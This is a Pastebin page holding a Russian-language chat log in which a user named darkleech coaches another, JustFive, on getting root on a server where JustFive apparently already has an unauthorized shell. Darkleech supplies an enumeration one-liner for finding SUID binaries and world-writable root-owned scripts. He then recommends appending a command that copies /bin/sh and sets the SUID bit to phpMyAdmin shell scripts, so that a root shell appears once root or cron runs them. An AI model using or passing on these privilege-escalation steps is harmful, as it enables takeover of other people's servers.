Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- darkleech@thesecure.biz
- 17:26 отходил
- 17:28 это нерутабельное ядро. Можно попробовать другими путями. Какие права у тебя там? Юзера или Апача? Это шаред хостинг или отдельный сервер какого-то чувака?
- Дай команду:
- uname -a; cat /etc/crontab; ls -lia --full-time /etc/cron* /lib; find / -type f -perm -u+s -exec ls -lia {} \; 2>/dev/null; find / -type f -name "*.sh" -user root -perm -o+rw -exec ls -la {} \; 2>/dev/null
- JustFive
- 17:31 привет
- 17:31 ты до этого общался
- 17:31 с моим партнером
- 17:31 он тебе писал
- darkleech@thesecure.biz
- 17:31 привет
- 17:31 ок
- JustFive
- 17:32 по поводу
- 17:32 сервера
- 17:32 где есть шелл
- 17:32 и нужно получить рут
- 17:32 ?
- darkleech@thesecure.biz
- 17:32 да
- JustFive
- 17:32 Linux www. 2.6.32-el-smp-alt27 #1 SMP Tue Sep 20 19:38:45 UTC 2011 x86_64
- 17:33 это ядро
- 17:33 ?
- darkleech@thesecure.biz
- 17:33 это нерутабельное ядро. Можно попробовать другими путями. Какие права у тебя там? Юзера или Апача? Это шаред хостинг или отдельный сервер какого-то чувака?
- Дай команду:
- uname -a; cat /etc/crontab; ls -lia --full-time /etc/cron* /lib; find / -type f -perm -u+s -exec ls -lia {} \; 2>/dev/null; find / -type f -name "*.sh" -user root -perm -o+rw -exec ls -la {} \; 2>/dev/null
- JustFive
- 17:35 http://pastebin.com/AR9KAjSi
- darkleech@thesecure.biz
- 17:39 -rwxrwxrwx 1 root root 885 Aug 9 2009 /var/www/apache2/adapted/phpmy/libraries/transformations/generator.sh
- -rwxrwxrwx 1 root root 666 Aug 9 2009 /var/www/apache2/adapted/phpmy/libraries/transformations/template_generator.sh
- -rwxrwxrwx 1 root root 546 Aug 9 2009 /var/www/apache2/adapted/phpmy/libraries/transformations/template_generator_mimetype.sh
- -rwxrwxrwx 1 root root 1269 Aug 9 2009 /var/www/apache2/adapted/phpmy/scripts/find_unused_messages.sh
- -rwxrwxrwx 1 root root 415 Aug 9 2009 /var/www/apache2/adapted/phpmy/scripts/remove_control_m.sh
- -rwxrwxrwx 1 root root 5873 Aug 9 2009 /var/www/apache2/adapted/phpmy/scripts/create-release.sh
- -rwxrwxrwx 1 root root 2201 Aug 9 2009 /var/www/apache2/adapted/phpmy/scripts/lang-cleanup.sh
- -rwxrwxrwx 1 root root 795 Aug 9 2009 /var/www/apache2/adapted/phpmy/lang/add_message.sh
- -rwxrwxrwx 1 root root 1633 Aug 9 2009 /var/www/apache2/adapted/phpmy/lang/check_lang.sh
- -rwxrwxrwx 1 root root 2092 Aug 9 2009 /var/www/apache2/adapted/phpmy/lang/sort_lang.sh
- -rwxrwxrwx 1 root root 564 Aug 9 2009 /var/www/apache2/adapted/phpmy/lang/remove_message.sh
- -rwxrwxrwx 1 root root 931 Aug 9 2009 /var/www/apache2/adapted/phpmy/lang/translatecount.sh
- -rwxrwxrwx 1 root root 798 Aug 9 2009 /var/www/apache2/adapted/phpmy/lang/add_message_file.sh
- вот эти все файлы доступны к редактированию и есть вероятность, что их запускает рут, можно вписать к каждому в конце
- cp /bin/sh /bin/sh2; chmod +s /bin/sh2
- и когда рут запустит - получится суидный рутовый шелл /bin/sh2
- 17:39 а что выводит
- cat /etc/crontab 2>&1
- 17:39 ?
- JustFive
- 17:39 нет прав
- darkleech@thesecure.biz
- 17:39 а точно
- 17:39 завтыкал
- 17:40 тогда единственный вариант править эти файлы в надежде что рут их запустит или по крону запускает
- JustFive
- 17:40 а если прописать
- 17:40 и в ребут кинуть
- 17:40 или прав нет
- 17:40 что бы в ребут кинуть
- 17:40 ?
- darkleech@thesecure.biz
- 17:40 в ребут не получится
- JustFive
- 17:42 хм ладно
- 17:42 спасибо
- darkleech@thesecure.biz
- 17:42 пожалуйста
- JustFive
- 17:42 а этож май админ да?
- 17:42 или что это за файлы
- darkleech@thesecure.biz
- 17:42 по названию похоже на него
- JustFive
- 17:43 а как его заюзать после запуска
- 17:43 или посмотреть что команда запустилась
- 17:43 ?
- darkleech@thesecure.biz
- 17:43 если его рут или рутовый крон запустит, то появится файл /bin/sh2 - его запускаешь и ты рут
- JustFive
- 17:47 а понял спасибо
- 17:47 будем править
- darkleech@thesecure.biz
- 17:48 ok
- 18:06 Вы подключились
- 18:50 darkleech@thesecure.biz отошел
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement
